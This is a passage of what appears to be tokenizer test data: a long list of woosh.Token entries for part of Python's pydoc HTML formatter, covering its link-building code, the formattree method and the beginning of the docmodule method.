woosh.Token(woosh.COMMENT, "# Create a link for methods like 'self.method(...)'", 700, 16, 700, 67),
woosh.Token(woosh.COMMENT, "# and use <strong> for attributes like 'self.attr'", 701, 16, 701, 66),
woosh.Token(woosh.INDENT, ' ', 702, 0, 702, 16),
woosh.Token(woosh.NAME, 'if', 702, 16, 702, 18),
woosh.Token(woosh.NAME, 'text', 702, 19, 702, 23),
woosh.Token(woosh.OP, '[', 702, 23, 702, 24),
woosh.Token(woosh.NAME, 'end', 702, 24, 702, 27),
woosh.Token(woosh.OP, ':', 702, 27, 702, 28),
woosh.Token(woosh.NAME, 'end', 702, 28, 702, 31),
woosh.Token(woosh.OP, '+', 702, 31, 702, 32),
woosh.Token(woosh.NUMBER, '1', 702, 32, 702, 33),
woosh.Token(woosh.OP, ']', 702, 33, 702, 34),
woosh.Token(woosh.OP, '==', 702, 35, 702, 37),
woosh.Token(woosh.STRING, "'('", 702, 38, 702, 41),
woosh.Token(woosh.OP, ':', 702, 41, 702, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 702, 42, 703, 0),
woosh.Token(woosh.INDENT, ' ', 703, 0, 703, 20),
woosh.Token(woosh.NAME, 'results', 703, 20, 703, 27),
woosh.Token(woosh.OP, '.', 703, 27, 703, 28),
woosh.Token(woosh.NAME, 'append', 703, 28, 703, 34),
woosh.Token(woosh.OP, '(', 703, 34, 703, 35),
woosh.Token(woosh.STRING, "'self.'", 703, 35, 703, 42),
woosh.Token(woosh.OP, '+', 703, 43, 703, 44),
woosh.Token(woosh.NAME, 'self', 703, 45, 703, 49),
woosh.Token(woosh.OP, '.', 703, 49, 703, 50),
woosh.Token(woosh.NAME, 'namelink', 703, 50, 703, 58),
woosh.Token(woosh.OP, '(', 703, 58, 703, 59),
woosh.Token(woosh.NAME, 'name', 703, 59, 703, 63),
woosh.Token(woosh.OP, ',', 703, 63, 703, 64),
woosh.Token(woosh.NAME, 'methods', 703, 65, 703, 72),
woosh.Token(woosh.OP, ')', 703, 72, 703, 73),
woosh.Token(woosh.OP, ')', 703, 73, 703, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 703, 74, 704, 0),
woosh.Token(woosh.DEDENT, ' ', 704, 0, 704, 16),
woosh.Token(woosh.NAME, 'else', 704, 16, 704, 20),
woosh.Token(woosh.OP, ':', 704, 20, 704, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 704, 21, 705, 0),
woosh.Token(woosh.INDENT, ' ', 705, 0, 705, 20),
woosh.Token(woosh.NAME, 'results', 705, 20, 705, 27),
woosh.Token(woosh.OP, '.', 705, 27, 705, 28),
woosh.Token(woosh.NAME, 'append', 705, 28, 705, 34),
woosh.Token(woosh.OP, '(', 705, 34, 705, 35),
woosh.Token(woosh.STRING, "'self.<strong>%s</strong>'", 705, 35, 705, 61),
woosh.Token(woosh.OP, '%', 705, 62, 705, 63),
woosh.Token(woosh.NAME, 'name', 705, 64, 705, 68),
woosh.Token(woosh.OP, ')', 705, 68, 705, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 705, 69, 706, 0),
woosh.Token(woosh.DEDENT, ' ', 706, 0, 706, 12),
woosh.Token(woosh.DEDENT, '', 706, 12, 706, 12),
woosh.Token(woosh.NAME, 'elif', 706, 12, 706, 16),
woosh.Token(woosh.NAME, 'text', 706, 17, 706, 21),
woosh.Token(woosh.OP, '[', 706, 21, 706, 22),
woosh.Token(woosh.NAME, 'end', 706, 22, 706, 25),
woosh.Token(woosh.OP, ':', 706, 25, 706, 26),
woosh.Token(woosh.NAME, 'end', 706, 26, 706, 29),
woosh.Token(woosh.OP, '+', 706, 29, 706, 30),
woosh.Token(woosh.NUMBER, '1', 706, 30, 706, 31),
woosh.Token(woosh.OP, ']', 706, 31, 706, 32),
woosh.Token(woosh.OP, '==', 706, 33, 706, 35),
woosh.Token(woosh.STRING, "'('", 706, 36, 706, 39),
woosh.Token(woosh.OP, ':', 706, 39, 706, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 706, 40, 707, 0),
woosh.Token(woosh.INDENT, ' ', 707, 0, 707, 16),
woosh.Token(woosh.NAME, 'results', 707, 16, 707, 23),
woosh.Token(woosh.OP, '.', 707, 23, 707, 24),
woosh.Token(woosh.NAME, 'append', 707, 24, 707, 30),
woosh.Token(woosh.OP, '(', 707, 30, 707, 31),
woosh.Token(woosh.NAME, 'self', 707, 31, 707, 35),
woosh.Token(woosh.OP, '.', 707, 35, 707, 36),
woosh.Token(woosh.NAME, 'namelink', 707, 36, 707, 44),
woosh.Token(woosh.OP, '(', 707, 44, 707, 45),
woosh.Token(woosh.NAME, 'name', 707, 45, 707, 49),
woosh.Token(woosh.OP, ',', 707, 49, 707, 50),
woosh.Token(woosh.NAME, 'methods', 707, 51, 707, 58),
woosh.Token(woosh.OP, ',', 707, 58, 707, 59),
woosh.Token(woosh.NAME, 'funcs', 707, 60, 707, 65),
woosh.Token(woosh.OP, ',', 707, 65, 707, 66),
woosh.Token(woosh.NAME, 'classes', 707, 67, 707, 74),
woosh.Token(woosh.OP, ')', 707, 74, 707, 75),
woosh.Token(woosh.OP, ')', 707, 75, 707, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 707, 76, 708, 0),
woosh.Token(woosh.DEDENT, ' ', 708, 0, 708, 12),
woosh.Token(woosh.NAME, 'else', 708, 12, 708, 16),
woosh.Token(woosh.OP, ':', 708, 16, 708, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 708, 17, 709, 0),
woosh.Token(woosh.INDENT, ' ', 709, 0, 709, 16),
woosh.Token(woosh.NAME, 'results', 709, 16, 709, 23),
woosh.Token(woosh.OP, '.', 709, 23, 709, 24),
woosh.Token(woosh.NAME, 'append', 709, 24, 709, 30),
woosh.Token(woosh.OP, '(', 709, 30, 709, 31),
woosh.Token(woosh.NAME, 'self', 709, 31, 709, 35),
woosh.Token(woosh.OP, '.', 709, 35, 709, 36),
woosh.Token(woosh.NAME, 'namelink', 709, 36, 709, 44),
woosh.Token(woosh.OP, '(', 709, 44, 709, 45),
woosh.Token(woosh.NAME, 'name', 709, 45, 709, 49),
woosh.Token(woosh.OP, ',', 709, 49, 709, 50),
woosh.Token(woosh.NAME, 'classes', 709, 51, 709, 58),
woosh.Token(woosh.OP, ')', 709, 58, 709, 59),
woosh.Token(woosh.OP, ')', 709, 59, 709, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 709, 60, 710, 0),
woosh.Token(woosh.DEDENT, ' ', 710, 0, 710, 12),
woosh.Token(woosh.NAME, 'here', 710, 12, 710, 16),
woosh.Token(woosh.OP, '=', 710, 17, 710, 18),
woosh.Token(woosh.NAME, 'end', 710, 19, 710, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 710, 22, 711, 0),
woosh.Token(woosh.DEDENT, ' ', 711, 0, 711, 8),
woosh.Token(woosh.NAME, 'results', 711, 8, 711, 15),
woosh.Token(woosh.OP, '.', 711, 15, 711, 16),
woosh.Token(woosh.NAME, 'append', 711, 16, 711, 22),
woosh.Token(woosh.OP, '(', 711, 22, 711, 23),
woosh.Token(woosh.NAME, 'escape', 711, 23, 711, 29),
woosh.Token(woosh.OP, '(', 711, 29, 711, 30),
woosh.Token(woosh.NAME, 'text', 711, 30, 711, 34),
woosh.Token(woosh.OP, '[', 711, 34, 711, 35),
woosh.Token(woosh.NAME, 'here', 711, 35, 711, 39),
woosh.Token(woosh.OP, ':', 711, 39, 711, 40),
woosh.Token(woosh.OP, ']', 711, 40, 711, 41),
woosh.Token(woosh.OP, ')', 711, 41, 711, 42),
woosh.Token(woosh.OP, ')', 711, 42, 711, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 711, 43, 712, 0),
woosh.Token(woosh.NAME, 'return', 712, 8, 712, 14),
woosh.Token(woosh.STRING, "''", 712, 15, 712, 17),
woosh.Token(woosh.OP, '.', 712, 17, 712, 18),
woosh.Token(woosh.NAME, 'join', 712, 18, 712, 22),
woosh.Token(woosh.OP, '(', 712, 22, 712, 23),
woosh.Token(woosh.NAME, 'results', 712, 23, 712, 30),
woosh.Token(woosh.OP, ')', 712, 30, 712, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 712, 31, 713, 0),
woosh.Token(woosh.COMMENT, '# ---------------------------------------------- type-specific routines', 714, 4, 714, 75),
woosh.Token(woosh.DEDENT, ' ', 716, 0, 716, 4),
woosh.Token(woosh.NAME, 'def', 716, 4, 716, 7),
woosh.Token(woosh.NAME, 'formattree', 716, 8, 716, 18),
woosh.Token(woosh.OP, '(', 716, 18, 716, 19),
woosh.Token(woosh.NAME, 'self', 716, 19, 716, 23),
woosh.Token(woosh.OP, ',', 716, 23, 716, 24),
woosh.Token(woosh.NAME, 'tree', 716, 25, 716, 29),
woosh.Token(woosh.OP, ',', 716, 29, 716, 30),
woosh.Token(woosh.NAME, 'modname', 716, 31, 716, 38),
woosh.Token(woosh.OP, ',', 716, 38, 716, 39),
woosh.Token(woosh.NAME, 'parent', 716, 40, 716, 46),
woosh.Token(woosh.OP, '=', 716, 46, 716, 47),
woosh.Token(woosh.NAME, 'None', 716, 47, 716, 51),
woosh.Token(woosh.OP, ')', 716, 51, 716, 52),
woosh.Token(woosh.OP, ':', 716, 52, 716, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 716, 53, 717, 0),
woosh.Token(woosh.INDENT, ' ', 717, 0, 717, 8),
woosh.Token(woosh.STRING, '"""Produce HTML for a class tree as given by inspect.getclasstree()."""', 717, 8, 717, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 717, 79, 718, 0),
woosh.Token(woosh.NAME, 'result', 718, 8, 718, 14),
woosh.Token(woosh.OP, '=', 718, 15, 718, 16),
woosh.Token(woosh.STRING, "''", 718, 17, 718, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 718, 19, 719, 0),
woosh.Token(woosh.NAME, 'for', 719, 8, 719, 11),
woosh.Token(woosh.NAME, 'entry', 719, 12, 719, 17),
woosh.Token(woosh.NAME, 'in', 719, 18, 719, 20),
woosh.Token(woosh.NAME, 'tree', 719, 21, 719, 25),
woosh.Token(woosh.OP, ':', 719, 25, 719, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 719, 26, 720, 0),
woosh.Token(woosh.INDENT, ' ', 720, 0, 720, 12),
woosh.Token(woosh.NAME, 'if', 720, 12, 720, 14),
woosh.Token(woosh.NAME, 'type', 720, 15, 720, 19),
woosh.Token(woosh.OP, '(', 720, 19, 720, 20),
woosh.Token(woosh.NAME, 'entry', 720, 20, 720, 25),
woosh.Token(woosh.OP, ')', 720, 25, 720, 26),
woosh.Token(woosh.NAME, 'is', 720, 27, 720, 29),
woosh.Token(woosh.NAME, 'type', 720, 30, 720, 34),
woosh.Token(woosh.OP, '(', 720, 34, 720, 35),
woosh.Token(woosh.OP, '(', 720, 35, 720, 36),
woosh.Token(woosh.OP, ')', 720, 36, 720, 37),
woosh.Token(woosh.OP, ')', 720, 37, 720, 38),
woosh.Token(woosh.OP, ':', 720, 38, 720, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 720, 39, 721, 0),
woosh.Token(woosh.INDENT, ' ', 721, 0, 721, 16),
woosh.Token(woosh.NAME, 'c', 721, 16, 721, 17),
woosh.Token(woosh.OP, ',', 721, 17, 721, 18),
woosh.Token(woosh.NAME, 'bases', 721, 19, 721, 24),
woosh.Token(woosh.OP, '=', 721, 25, 721, 26),
woosh.Token(woosh.NAME, 'entry', 721, 27, 721, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 721, 32, 722, 0),
woosh.Token(woosh.NAME, 'result', 722, 16, 722, 22),
woosh.Token(woosh.OP, '=', 722, 23, 722, 24),
woosh.Token(woosh.NAME, 'result', 722, 25, 722, 31),
woosh.Token(woosh.OP, '+', 722, 32, 722, 33),
woosh.Token(woosh.STRING, '\'<dt><font face="helvetica, arial">\'', 722, 34, 722, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 722, 70, 723, 0),
woosh.Token(woosh.NAME, 'result', 723, 16, 723, 22),
woosh.Token(woosh.OP, '=', 723, 23, 723, 24),
woosh.Token(woosh.NAME, 'result', 723, 25, 723, 31),
woosh.Token(woosh.OP, '+', 723, 32, 723, 33),
woosh.Token(woosh.NAME, 'self', 723, 34, 723, 38),
woosh.Token(woosh.OP, '.', 723, 38, 723, 39),
woosh.Token(woosh.NAME, 'classlink', 723, 39, 723, 48),
woosh.Token(woosh.OP, '(', 723, 48, 723, 49),
woosh.Token(woosh.NAME, 'c', 723, 49, 723, 50),
woosh.Token(woosh.OP, ',', 723, 50, 723, 51),
woosh.Token(woosh.NAME, 'modname', 723, 52, 723, 59),
woosh.Token(woosh.OP, ')', 723, 59, 723, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 723, 60, 724, 0),
woosh.Token(woosh.NAME, 'if', 724, 16, 724, 18),
woosh.Token(woosh.NAME, 'bases', 724, 19, 724, 24),
woosh.Token(woosh.NAME, 'and', 724, 25, 724, 28),
woosh.Token(woosh.NAME, 'bases', 724, 29, 724, 34),
woosh.Token(woosh.OP, '!=', 724, 35, 724, 37),
woosh.Token(woosh.OP, '(', 724, 38, 724, 39),
woosh.Token(woosh.NAME, 'parent', 724, 39, 724, 45),
woosh.Token(woosh.OP, ',', 724, 45, 724, 46),
woosh.Token(woosh.OP, ')', 724, 46, 724, 47),
woosh.Token(woosh.OP, ':', 724, 47, 724, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 724, 48, 725, 0),
woosh.Token(woosh.INDENT, ' ', 725, 0, 725, 20),
woosh.Token(woosh.NAME, 'parents', 725, 20, 725, 27),
woosh.Token(woosh.OP, '=', 725, 28, 725, 29),
woosh.Token(woosh.OP, '[', 725, 30, 725, 31),
woosh.Token(woosh.OP, ']', 725, 31, 725, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 725, 32, 726, 0),
woosh.Token(woosh.NAME, 'for', 726, 20, 726, 23),
woosh.Token(woosh.NAME, 'base', 726, 24, 726, 28),
woosh.Token(woosh.NAME, 'in', 726, 29, 726, 31),
woosh.Token(woosh.NAME, 'bases', 726, 32, 726, 37),
woosh.Token(woosh.OP, ':', 726, 37, 726, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 726, 38, 727, 0),
woosh.Token(woosh.INDENT, ' ', 727, 0, 727, 24),
woosh.Token(woosh.NAME, 'parents', 727, 24, 727, 31),
woosh.Token(woosh.OP, '.', 727, 31, 727, 32),
woosh.Token(woosh.NAME, 'append', 727, 32, 727, 38),
woosh.Token(woosh.OP, '(', 727, 38, 727, 39),
woosh.Token(woosh.NAME, 'self', 727, 39, 727, 43),
woosh.Token(woosh.OP, '.', 727, 43, 727, 44),
woosh.Token(woosh.NAME, 'classlink', 727, 44, 727, 53),
woosh.Token(woosh.OP, '(', 727, 53, 727, 54),
woosh.Token(woosh.NAME, 'base', 727, 54, 727, 58),
woosh.Token(woosh.OP, ',', 727, 58, 727, 59),
woosh.Token(woosh.NAME, 'modname', 727, 60, 727, 67),
woosh.Token(woosh.OP, ')', 727, 67, 727, 68),
woosh.Token(woosh.OP, ')', 727, 68, 727, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 727, 69, 728, 0),
woosh.Token(woosh.DEDENT, ' ', 728, 0, 728, 20),
woosh.Token(woosh.NAME, 'result', 728, 20, 728, 26),
woosh.Token(woosh.OP, '=', 728, 27, 728, 28),
woosh.Token(woosh.NAME, 'result', 728, 29, 728, 35),
woosh.Token(woosh.OP, '+', 728, 36, 728, 37),
woosh.Token(woosh.STRING, "'('", 728, 38, 728, 41),
woosh.Token(woosh.OP, '+', 728, 42, 728, 43),
woosh.Token(woosh.STRING, "', '", 728, 44, 728, 48),
woosh.Token(woosh.OP, '.', 728, 48, 728, 49),
woosh.Token(woosh.NAME, 'join', 728, 49, 728, 53),
woosh.Token(woosh.OP, '(', 728, 53, 728, 54),
woosh.Token(woosh.NAME, 'parents', 728, 54, 728, 61),
woosh.Token(woosh.OP, ')', 728, 61, 728, 62),
woosh.Token(woosh.OP, '+', 728, 63, 728, 64),
woosh.Token(woosh.STRING, "')'", 728, 65, 728, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 728, 68, 729, 0),
woosh.Token(woosh.DEDENT, ' ', 729, 0, 729, 16),
woosh.Token(woosh.NAME, 'result', 729, 16, 729, 22),
woosh.Token(woosh.OP, '=', 729, 23, 729, 24),
woosh.Token(woosh.NAME, 'result', 729, 25, 729, 31),
woosh.Token(woosh.OP, '+', 729, 32, 729, 33),
woosh.Token(woosh.STRING, "'\\n</font></dt>'", 729, 34, 729, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 729, 50, 730, 0),
woosh.Token(woosh.DEDENT, ' ', 730, 0, 730, 12),
woosh.Token(woosh.NAME, 'elif', 730, 12, 730, 16),
woosh.Token(woosh.NAME, 'type', 730, 17, 730, 21),
woosh.Token(woosh.OP, '(', 730, 21, 730, 22),
woosh.Token(woosh.NAME, 'entry', 730, 22, 730, 27),
woosh.Token(woosh.OP, ')', 730, 27, 730, 28),
woosh.Token(woosh.NAME, 'is', 730, 29, 730, 31),
woosh.Token(woosh.NAME, 'type', 730, 32, 730, 36),
woosh.Token(woosh.OP, '(', 730, 36, 730, 37),
woosh.Token(woosh.OP, '[', 730, 37, 730, 38),
woosh.Token(woosh.OP, ']', 730, 38, 730, 39),
woosh.Token(woosh.OP, ')', 730, 39, 730, 40),
woosh.Token(woosh.OP, ':', 730, 40, 730, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 730, 41, 731, 0),
woosh.Token(woosh.INDENT, ' ', 731, 0, 731, 16),
woosh.Token(woosh.NAME, 'result', 731, 16, 731, 22),
woosh.Token(woosh.OP, '=', 731, 23, 731, 24),
woosh.Token(woosh.NAME, 'result', 731, 25, 731, 31),
woosh.Token(woosh.OP, '+', 731, 32, 731, 33),
woosh.Token(woosh.STRING, "'<dd>\\n%s</dd>\\n'", 731, 34, 731, 51),
woosh.Token(woosh.OP, '%', 731, 52, 731, 53),
woosh.Token(woosh.NAME, 'self', 731, 54, 731, 58),
woosh.Token(woosh.OP, '.', 731, 58, 731, 59),
woosh.Token(woosh.NAME, 'formattree', 731, 59, 731, 69),
woosh.Token(woosh.OP, '(', 731, 69, 731, 70),
woosh.Token(woosh.NAME, 'entry', 732, 20, 732, 25),
woosh.Token(woosh.OP, ',', 732, 25, 732, 26),
woosh.Token(woosh.NAME, 'modname', 732, 27, 732, 34),
woosh.Token(woosh.OP, ',', 732, 34, 732, 35),
woosh.Token(woosh.NAME, 'c', 732, 36, 732, 37),
woosh.Token(woosh.OP, ')', 732, 37, 732, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 732, 38, 733, 0),
woosh.Token(woosh.DEDENT, ' ', 733, 0, 733, 8),
woosh.Token(woosh.DEDENT, '', 733, 8, 733, 8),
woosh.Token(woosh.NAME, 'return', 733, 8, 733, 14),
woosh.Token(woosh.STRING, "'<dl>\\n%s</dl>\\n'", 733, 15, 733, 32),
woosh.Token(woosh.OP, '%', 733, 33, 733, 34),
woosh.Token(woosh.NAME, 'result', 733, 35, 733, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 733, 41, 734, 0),
woosh.Token(woosh.DEDENT, ' ', 735, 0, 735, 4),
woosh.Token(woosh.NAME, 'def', 735, 4, 735, 7),
woosh.Token(woosh.NAME, 'docmodule', 735, 8, 735, 17),
woosh.Token(woosh.OP, '(', 735, 17, 735, 18),
woosh.Token(woosh.NAME, 'self', 735, 18, 735, 22),
woosh.Token(woosh.OP, ',', 735, 22, 735, 23),
woosh.Token(woosh.NAME, 'object', 735, 24, 735, 30),
woosh.Token(woosh.OP, ',', 735, 30, 735, 31),
woosh.Token(woosh.NAME, 'name', 735, 32, 735, 36),
woosh.Token(woosh.OP, '=', 735, 36, 735, 37),
woosh.Token(woosh.NAME, 'None', 735, 37, 735, 41),
woosh.Token(woosh.OP, ',', 735, 41, 735, 42),
woosh.Token(woosh.NAME, 'mod', 735, 43, 735, 46),
woosh.Token(woosh.OP, '=', 735, 46, 735, 47),
woosh.Token(woosh.NAME, 'None', 735, 47, 735, 51),
woosh.Token(woosh.OP, ',', 735, 51, 735, 52),
woosh.Token(woosh.OP, '*', 735, 53, 735, 54),
woosh.Token(woosh.NAME, 'ignored', 735, 54, 735, 61),
woosh.Token(woosh.OP, ')', 735, 61, 735, 62),
woosh.Token(woosh.OP, ':', 735, 62, 735, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 735, 63, 736, 0),
woosh.Token(woosh.INDENT, ' ', 736, 0, 736, 8),
woosh.Token(woosh.STRING, '"""Produce HTML documentation for a module object."""', 736, 8, 736, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 736, 61, 737, 0),
woosh.Token(woosh.NAME, 'name', 737, 8, 737, 12),
woosh.Token(woosh.OP, '=', 737, 13, 737, 14),
woosh.Token(woosh.NAME, 'object', 737, 15, 737, 21),
woosh.Token(woosh.OP, '.', 737, 21, 737, 22),
woosh.Token(woosh.NAME, '__name__', 737, 22, 737, 30),
woosh.Token(woosh.COMMENT, '# ignore the passed-in name', 737, 31, 737, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 737, 58, 738, 0),
woosh.Token(woosh.NAME, 'try', 738, 8, 738, 11),
woosh.Token(woosh.OP, ':', 738, 11, 738, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 738, 12, 739, 0),
woosh.Token(woosh.INDENT, ' ', 739, 0, 739, 12),
woosh.Token(woosh.NAME, 'all', 739, 12, 739, 15),
woosh.Token(woosh.OP, '=', 739, 16, 739, 17),
woosh.Token(woosh.NAME, 'object', 739, 18, 739, 24),
woosh.Token(woosh.OP, '.', 739, 24, 739, 25),
woosh.Token(woosh.NAME, '__all__', 739, 25, 739, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 739, 32, 740, 0),
woosh.Token(woosh.DEDENT, ' ', 740, 0, 740, 8),
woosh.Token(woosh.NAME, 'except', 740, 8, 740, 14),
woosh.Token(woosh.NAME, 'AttributeError', 740, 15, 740, 29),
woosh.Token(woosh.OP, ':', 740, 29, 740, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 740, 30, 741, 0),
woosh.Token(woosh.INDENT, ' ', 741, 0, 741, 12),
woosh.Token(woosh.NAME, 'all', 741, 12, 741, 15),
woosh.Token(woosh.OP, '=', 741, 16, 741, 17),
woosh.Token(woosh.NAME, 'None', 741, 18, 741, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 741, 22, 742, 0),
woosh.Token(woosh.DEDENT, ' ', 742, 0, 742, 8),
woosh.Token(woosh.NAME, 'parts', 742, 8, 742, 13),
woosh.Token(woosh.OP, '=', 742, 14, 742, 15),
woosh.Token(woosh.NAME, 'name', 742, 16, 742, 20),
woosh.Token(woosh.OP, '.', 742, 20, 742, 21),
woosh.Token(woosh.NAME, 'split', 742, 21, 742, 26),
woosh.Token(woosh.OP, '(', 742, 26, 742, 27),
woosh.Token(woosh.STRING, "'.'", 742, 27, 742, 30),
woosh.Token(woosh.OP, ')', 742, 30, 742, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 742, 31, 743, 0),
woosh.Token(woosh.NAME, 'links', 743, 8, 743, 13),
woosh.Token(woosh.OP, '=', 743, 14, 743, 15),
woosh.Token(woosh.OP, '[', 743, 16, 743, 17),
woosh.Token(woosh.OP, ']', 743, 17, 743, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 743, 18, 744, 0),
woosh.Token(woosh.NAME, 'for', 744, 8, 744, 11),
woosh.Token(woosh.NAME, 'i', 744, 12, 744, 13),
woosh.Token(woosh.NAME, 'in', 744, 14, 744, 16),
woosh.Token(woosh.NAME, 'range', 744, 17, 744, 22),
woosh.Token(woosh.OP, '(', 744, 22, 744, 23),
woosh.Token(woosh.NAME, 'len', 744, 23, 744, 26),
woosh.Token(woosh.OP, '(', 744, 26, 744, 27),
woosh.Token(woosh.NAME, 'parts', 744, 27, 744, 32),
woosh.Token(woosh.OP, ')', 744, 32, 744, 33),
woosh.Token(woosh.OP, '-', 744, 33, 744, 34),
woosh.Token(woosh.NUMBER, '1', 744, 34, 744, 35),
woosh.Token(woosh.OP, ')', 744, 35, 744, 36),
woosh.Token(woosh.OP, ':', 744, 36, 744, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 744, 37, 745, 0),
woosh.Token(woosh.INDENT, ' ', 745, 0, 745, 12),
woosh.Token(woosh.NAME, 'links', 745, 12, 745, 17),
woosh.Token(woosh.OP, '.', 745, 17, 745, 18),
woosh.Token(woosh.NAME, 'append', 745, 18, 745, 24),
woosh.Token(woosh.OP, '(', 745, 24, 745, 25),
woosh.Token(woosh.STRING, '\'<a href="%s.html"><font color="#ffffff">%s</font></a>\'', 746, 16, 746, 71),
woosh.Token(woosh.OP, '%', 746, 72, 746, 73),
woosh.Token(woosh.OP, '(', 747, 16, 747, 17),
woosh.Token(woosh.STRING, "'.'", 747, 17, 747, 20),
woosh.Token(woosh.OP, '.', 747, 20, 747, 21),
woosh.Token(woosh.NAME, 'join', 747, 21, 747, 25),
woosh.Token(woosh.OP, '(', 747, 25, 747, 26),
woosh.Token(woosh.NAME, 'parts', 747, 26, 747, 31),
woosh.Token(woosh.OP, '[', 747, 31, 747, 32),
woosh.Token(woosh.OP, ':', 747, 32, 747, 33),
woosh.Token(woosh.NAME, 'i', 747, 33, 747, 34),
woosh.Token(woosh.OP, '+', 747, 34, 747, 35),
woosh.Token(woosh.NUMBER, '1', 747, 35, 747, 36),
woosh.Token(woosh.OP, ']', 747, 36, 747, 37),
woosh.Token(woosh.OP, ')', 747, 37, 747, 38),
woosh.Token(woosh.OP, ',', 747, 38, 747, 39),
woosh.Token(woosh.NAME, 'parts', 747, 40, 747, 45),
woosh.Token(woosh.OP, '[', 747, 45, 747, 46),
woosh.Token(woosh.NAME, 'i', 747, 46, 747, 47),
woosh.Token(woosh.OP, ']', 747, 47, 747, 48),
woosh.Token(woosh.OP, ')', 747, 48, 747, 49),
woosh.Token(woosh.OP, ')', 747, 49, 747, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 747, 50, 748, 0),
woosh.Token(woosh.DEDENT, ' ', 748, 0, 748, 8),
woosh.Token(woosh.NAME, 'linkedname', 748, 8, 748, 18),
woosh.Token(woosh.OP, '=', 748, 19, 748, 20),
woosh.Token(woosh.STRING, "'.'", 748, 21, 748, 24),
woosh.Token(woosh.OP, '.', 748, 24, 748, 25),
woosh.Token(woosh.NAME, 'join', 748, 25, 748, 29),
woosh.Token(woosh.OP, '(', 748, 29, 748, 30),
woosh.Token(woosh.NAME, 'links', 748, 30, 748, 35),
woosh.Token(woosh.OP, '+', 748, 36, 748, 37),
woosh.Token(woosh.NAME, 'parts', 748, 38, 748, 43),
woosh.Token(woosh.OP, '[', 748, 43, 748, 44),
woosh.Token(woosh.OP, '-', 748, 44, 748, 45),
woosh.Token(woosh.NUMBER, '1', 748, 45, 748, 46),
woosh.Token(woosh.OP, ':', 748, 46, 748, 47),
woosh.Token(woosh.OP, ']', 748, 47, 748, 48),
woosh.Token(woosh.OP, ')', 748, 48, 748, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 748, 49, 749, 0),
woosh.Token(woosh.NAME, 'head', 749, 8, 749, 12),
woosh.Token(woosh.OP, '=', 749, 13, 749, 14),
woosh.Token(woosh.STRING, "'<big><big><strong>%s</strong></big></big>'", 749, 15, 749, 58),
woosh.Token(woosh.OP, '%', 749, 59, 749, 60),
woosh.Token(woosh.NAME, 'linkedname', 749, 61, 749, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 749, 71, 750, 0),
woosh.Token(woosh.NAME, 'try', 750, 8, 750, 11),
woosh.Token(woosh.OP, ':', 750, 11, 750, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 750, 12, 751, 0),
woosh.Token(woosh.INDENT, ' ', 751, 0, 751, 12),
woosh.Token(woosh.NAME, 'path', 751, 12, 751, 16),
woosh.Token(woosh.OP, '=', 751, 17, 751, 18),
woosh.Token(woosh.NAME, 'inspect', 751, 19, 751, 26),
woosh.Token(woosh.OP, '.', 751, 26, 751, 27),
woosh.Token(woosh.NAME, 'getabsfile', 751, 27, 751, 37),
woosh.Token(woosh.OP, '(', 751, 37, 751, 38),
woosh.Token(woosh.NAME, 'object', 751, 38, 751, 44),
woosh.Token(woosh.OP, ')', 751, 44, 751, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 751, 45, 752, 0),
woosh.Token(woosh.NAME, 'url', 752, 12, 752, 15),
woosh.Token(woosh.OP, '=', 752, 16, 752, 17),
woosh.Token(woosh.NAME, 'urllib', 752, 18, 752, 24),
woosh.Token(woosh.OP, '.', 752, 24, 752, 25),
woosh.Token(woosh.NAME, 'parse', 752, 25, 752, 30),
woosh.Token(woosh.OP, '.', 752, 30, 752, 31),
woosh.Token(woosh.NAME, 'quote', 752, 31, 752, 36),
woosh.Token(woosh.OP, '(', 752, 36, 752, 37),
woosh.Token(woosh.NAME, 'path', 752, 37, 752, 41),
woosh.Token(woosh.OP, ')', 752, 41, 752, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 752, 42, 753, 0),
woosh.Token(woosh.NAME, 'filelink', 753, 12, 753, 20),
woosh.Token(woosh.OP, '=', 753, 21, 753, 22),
woosh.Token(woosh.NAME, 'self', 753, 23, 753, 27),
woosh.Token(woosh.OP, '.', 753, 27, 753, 28),
woosh.Token(woosh.NAME, 'filelink', 753, 28, 753, 36),
woosh.Token(woosh.OP, '(', 753, 36, 753, 37),
woosh.Token(woosh.NAME, 'url', 753, 37, 753, 40),
woosh.Token(woosh.OP, ',', 753, 40, 753, 41),
woosh.Token(woosh.NAME, 'path', 753, 42, 753, 46),
